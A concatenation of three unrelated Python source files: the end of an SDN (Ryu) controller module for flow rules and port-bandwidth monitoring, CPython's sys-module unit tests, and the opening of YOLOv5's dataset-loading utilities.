match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_dst=flow_info[-1])
else:
pass
elif flow_info[-3] == 17:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_dst=flow_info[-1])
else:
pass
elif len(flow_info) == 4:
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2])
else:
pass
priority = flow_info[3] + 1
self.add_flow(datapath, priority, match, actions,
idle_timeout=15, hard_timeout=0)
def add_flow(self, dp, priority, match, actions, idle_timeout, hard_timeout):
"""
Send a flow entry to datapath.
"""
ofproto = dp.ofproto
parser = dp.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
mod = parser.OFPFlowMod(datapath=dp, priority=priority,
idle_timeout=idle_timeout,
hard_timeout=hard_timeout,
match=match, instructions=inst)
# print(mod)
dp.send_msg(mod)
def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
"""
Get port pair of link, so that controller can install flow entry.
link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
"""
if (src_dpid, dst_dpid) in link_to_port:
return link_to_port[(src_dpid, dst_dpid)]
else:
self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
(src_dpid, dst_dpid))
return None
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""
Save port's stats information into self.port_stats.
Calculate port speed and Save it.
self.port_stats = {(dpid, port_no):[(tx_bytes, rx_bytes, rx_errors, duration_sec, duration_nsec),],}
self.port_speed = {(dpid, port_no):[speed,],}
Note: The transmit performance and receive performance are independent of a port.
We calculate the load of a port only using tx_bytes.
"""
body = ev.msg.body
dpid = ev.msg.datapath.id
self.stats['port'][dpid] = body
self.current_free_bandwidth.setdefault(dpid,{})
self.free_bandwidth.setdefault(dpid, {})
for stat in sorted(body, key=attrgetter('port_no')):
port_no = stat.port_no
if port_no != ofproto_v1_3.OFPP_LOCAL:
key = (dpid, port_no)
value = (stat.tx_bytes, stat.tx_dropped,stat.tx_errors,stat.tx_packets,stat.rx_bytes, stat.rx_errors,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.port_stats, key, value, 5)
# Get port speed and Save it.
pre = 0
pre1=()
pre2=()
period = setting.MONITOR_PERIOD
tmp = self.port_stats[key]
if len(tmp) > 1:
# Calculate only the tx_bytes, not the rx_bytes. (hmc)
pre = tmp[-2][0]
pre1=(tmp[-2][1],tmp[-2][3])
pre2=(tmp[-2][2],tmp[-2][3])
period = self._get_period(tmp[-1][-2], tmp[-1][-1], tmp[-2][-2], tmp[-2][-1])
speed = self._get_speed(self.port_stats[key][-1][0], pre, period)
loss=self._get_loss((self.port_stats[key][-1][1],self.port_stats[key][-1][3]),pre1,period)
errors=self._get_errors((self.port_stats[key][-1][2],self.port_stats[key][-1][3]),pre2,period)
self._save_stats(self.port_speed, key, speed, 5)
port_state = self.port_features.get(dpid).get(port_no)
if port_state:
self._save_freebandwidth(dpid, port_no, speed,port_state)
self._save_linksLoss(dpid,port_no,loss,port_state)
self._save_linksError(dpid,port_no,errors,port_state)
else:
self.logger.info("Port is Down")
def get_sw(self, dpid, in_port, src, dst):
"""
Get pair of source and destination switches.
"""
src_sw = dpid
dst_sw = None
src_location = self.awareness.get_host_location(src) # src_location = (dpid, port)
if in_port in self.awareness.access_ports[dpid]:
if (dpid, in_port) == src_location:
src_sw = src_location[0]
else:
return None
dst_location = self.awareness.get_host_location(dst) # dst_location = (dpid, port)
if dst_location:
dst_sw = dst_location[0]
if src_sw and dst_sw:
return src_sw, dst_sw
else:
return None
@set_ev_cls(ofp_event.EventOFPPortDescStatsReply, MAIN_DISPATCHER)
def port_desc_stats_reply_handler(self, ev):
"""
Save port description info.
"""
msg = ev.msg
dpid = msg.datapath.id
ofproto = msg.datapath.ofproto
config_dict = {ofproto.OFPPC_PORT_DOWN: "Down",
ofproto.OFPPC_NO_RECV: "No Recv",
ofproto.OFPPC_NO_FWD: "No Farward",
ofproto.OFPPC_NO_PACKET_IN: "No Packet-in"}
state_dict = {ofproto.OFPPS_LINK_DOWN: "Down",
ofproto.OFPPS_BLOCKED: "Blocked",
ofproto.OFPPS_LIVE: "Live"}
ports = []
for p in ev.msg.body:
ports.append('port_no=%d hw_addr=%s name=%s config=0x%08x '
'state=0x%08x curr=0x%08x advertised=0x%08x '
'supported=0x%08x peer=0x%08x curr_speed=%d '
'max_speed=%d' %
(p.port_no, p.hw_addr,
p.name, p.config,
p.state, p.curr, p.advertised,
p.supported, p.peer, p.curr_speed,
p.max_speed))
if p.config in config_dict:
config = config_dict[p.config]
else:
config = "up"
if p.state in state_dict:
state = state_dict[p.state]
else:
state = "up"
# Recording data.
port_feature = (config, state, p.curr_speed,p.max_speed)
self.port_features[dpid][p.port_no] = port_feature
@set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def _port_status_handler(self, ev):
"""
Handle the port status changed event.
"""
msg = ev.msg
ofproto = msg.datapath.ofproto
reason = msg.reason
dpid = msg.datapath.id
port_no = msg.desc.port_no
reason_dict = {ofproto.OFPPR_ADD: "added",
ofproto.OFPPR_DELETE: "deleted",
ofproto.OFPPR_MODIFY: "modified", }
if reason in reason_dict:
print "switch%d: port %s %s" % (dpid, reason_dict[reason], port_no)
else:
print "switch%d: Illeagal port state %s %s" % (dpid, port_no, reason)
def _request_stats(self, datapath):
"""
Sending request msg to datapath
"""
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortDescStatsRequest(datapath, 0)
datapath.send_msg(req)
# if(str(datapath.id)=='3'):
# req = parser.OFPFlowStatsRequest(datapath)
# datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
def get_min_bw_of_links(self, graph, path, min_bw):
"""
Getting bandwidth of path. Actually, the mininum bandwidth
of links is the path's bandwith, because it is the bottleneck of path.
"""
_len = len(path)
if _len > 1:
minimal_band_width = min_bw
for i in xrange(_len-1):
pre, curr = path[i], path[i+1]
if 'bandwidth' in graph[pre][curr]:
bw = graph[pre][curr]['bandwidth']
minimal_band_width = min(bw, minimal_band_width)
else:
continue
return minimal_band_width
else:
return min_bw
def get_best_path_by_bw(self, graph, paths):
"""
Get best path by comparing paths.
Note: This function is called in EFattree module.
"""
capabilities = {}
best_paths = copy.deepcopy(paths)
for src in paths:
for dst in paths[src]:
if src == dst:
best_paths[src][src] = [src]
capabilities.setdefault(src, {src: setting.MAX_CAPACITY})
capabilities[src][src] = setting.MAX_CAPACITY
else:
max_bw_of_paths = 0
best_path = paths[src][dst][0]
for path in paths[src][dst]:
min_bw = setting.MAX_CAPACITY
min_bw = self.get_min_bw_of_links(graph, path, min_bw)
if min_bw > max_bw_of_paths:
max_bw_of_paths = min_bw
best_path = path
best_paths[src][dst] = best_path
capabilities.setdefault(src, {dst: max_bw_of_paths})
capabilities[src][dst] = max_bw_of_paths
# self.capabilities and self.best_paths have no actual utility in this module.
self.capabilities = capabilities
self.best_paths = best_paths
return capabilities, best_paths
def create_static_bw_graph(self):
"""
Save bandwidth data into networkx graph object.
"""
try:
graph = self.awareness.graph
for link in graph.edges():
node1=link[0]
node2=link[1]
graph[node1][node2]['bandwidth']=setting.MAX_CAPACITY*1024
return graph
except:
self.logger.info("Create bw graph exception")
if self.awareness is None:
self.awareness = lookup_service_brick('awareness')
return self.awareness.graph
def create_graph(self, link_info):
"""
Save bandwidth data into networkx graph object.
"""
try:
graph = self.awareness.graph
link_to_port = self.awareness.link_to_port
for link in link_to_port:
(src_dpid, dst_dpid) = link
(src_port, dst_port) = link_to_port[link]
if src_dpid in link_info['bandwidth'].keys() and dst_dpid in link_info['bandwidth'].keys():
bandwidth = link_info['bandwidth'][src_dpid][src_port]
loss= link_info['loss'][src_dpid][src_port]
errors=link_info['errors'][src_dpid][src_port]
# Add key:value pair of bandwidth into graph.
if graph.has_edge(src_dpid, dst_dpid):
# graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
graph[src_dpid][dst_dpid]['loss'] = loss
graph[src_dpid][dst_dpid]['errors'] = errors
# else:
# graph.add_edge(src_dpid, dst_dpid)
# # graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# # if (str(src_dpid).startswith('3') and str(dst_dpid).startswith('2')) or (str(src_dpid).startswith('2') and str(dst_dpid).startswith('3')):
# # graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY*2
# # else:
# # graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
# graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
else:
if graph.has_edge(src_dpid, dst_dpid):
graph[src_dpid][dst_dpid]['bandwidth'] = 0
graph[src_dpid][dst_dpid]['loss'] = loss
graph[src_dpid][dst_dpid]['errors'] = errors
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
self.graph=graph
except:
self.logger.info("Create bw graph exception")
if self.awareness is None:
self.awareness = lookup_service_brick('awareness')
self.graph=self.awareness.graph
def _save_freebandwidth(self, dpid, port_no, speed,port_state):
"""
Calculate free bandwidth of port and Save it.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
self.free_bandwidth = {dpid:{port_no:free_bw,},}
"""
capacity = setting.MAX_CAPACITY # The true bandwidth of link, instead of 'curr_speed'.
free_bw = self._get_free_bw(capacity, speed)
if free_bw==0:
self.congested=True
# self.free_bandwidth[dpid].setdefault(port_no, None)
# self.free_bandwidth[dpid][port_no] = free_bw
self.link_info['bandwidth'].setdefault(dpid,{})
self.link_info['bandwidth'][dpid][port_no]=free_bw
def _save_linksLoss(self,dpid,port_no,loss,port_state):
self.link_info['loss'].setdefault(dpid,{})
self.link_info['loss'][dpid][port_no]=loss
def _save_linksError(self,dpid,port_no,errors,port_state):
self.link_info['errors'].setdefault(dpid,{})
self.link_info['errors'][dpid][port_no]=errors
def _save_stats(self, _dict, key, value, length=5):
if key not in _dict:
_dict[key] = []
_dict[key].append(value)
if len(_dict[key]) > length:
_dict[key].pop(0)
def _get_speed(self, now, pre, period):
if period:
return (now - pre) / (period)
else:
return 0
def _get_loss(self,now, pre, period):
if period:
try:
return (now[1]-pre[1])/(now[0]-pre[0])
except:
return 0
else:
return 0
def _get_errors(self,now, pre, period):
if period:
try:
return (now[1]-pre[1])/(now[0]-pre[0])
except:
return 0
else:
return 0
def _get_free_bw(self, capacity, speed):
# freebw: Kbit/s
return max(capacity - speed * 8 / 1024.0, 0)
def _get_time(self, sec, nsec):
return sec + nsec / 1000000000.0
def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):
return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)
def show_topology(self):
# It means the link_to_port table has changed.
_graph = self.graph
print "\n---------------------Link Port---------------------"
print '%6s' % ('switch'),
for node in sorted([node for node in _graph.nodes()], key=lambda node: node):
print '%6d' % node,
print
for node1 in sorted([node for node in _graph.nodes()], key=lambda node: node):
print '%6d' % node1,
for node2 in sorted([node for node in _graph.nodes()], key=lambda node: node):
if (node1, node2) in self.awareness.link_to_port.keys():
print '%6s' % str(self.awareness.link_to_port[(node1, node2)]),
print('%6s' %str(_graph[node1][node2]['bandwidth']))
else:
print '%6s' % '/',
print
print
def show_stat(self, _type):
'''
Show statistics information according to data type.
_type: 'port' / 'flow'
'''
if setting.TOSHOW is False:
return
bodys = self.stats[_type]
if _type == 'flow':
print('\ndatapath '
'priority ip_src ip_dst '
' packets bytes flow-speed(Kb/s)')
print('-------- '
'-------- ------------ ------------ '
'--------- ----------- ----------------')
for dpid in sorted(bodys.keys()):
for stat in sorted([flow for flow in bodys[dpid] if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
print('%8d %8s %12s %12s %9d %11d %16.1f' % (
dpid,
stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'),
stat.packet_count, stat.byte_count,
abs(self.flow_speed[dpid][(stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))][-1])*8/1000.0))
print
if _type == 'port':
print('\ndatapath port '
' rx-pkts rx-bytes '' tx-pkts tx-bytes '
' port-bw(Kb/s) port-speed(b/s) port-freebw(Kb/s) '
' port-state link-state')
print('-------- ---- '
'--------- ----------- ''--------- ----------- '
'------------- --------------- ----------------- '
'---------- ----------')
_format = '%8d %4x %9d %11d %9d %11d %13d %15.1f %17.1f %10s %10s'
for dpid in sorted(bodys.keys()):
for stat in sorted(bodys[dpid], key=attrgetter('port_no')):
if stat.port_no != ofproto_v1_3.OFPP_LOCAL:
print(_format % (
dpid, stat.port_no,
stat.rx_packets, stat.rx_bytes,
stat.tx_packets, stat.tx_bytes,
10000,
abs(self.port_speed[(dpid, stat.port_no)][-1] * 8),
self.free_bandwidth[dpid][stat.port_no],
self.port_features[dpid][stat.port_no][0],
self.port_features[dpid][stat.port_no][1]))
print
|
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def DONT_test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.test_support.impl_detail("CPython-only gimmick")
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
if hasattr(sys, 'prefix'):
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
else:
self.assert_(isinstance(sys.pypy_prefix, basestring)) # PyPy only
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_main():
test.test_support.run_unittest(SysModuleTest)
if __name__ == "__main__":
test_main()
|
datasets.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, \
xywh2xyxy, xywhn2xyxy, xyxy2xywhn, xyn2xy
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
# print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
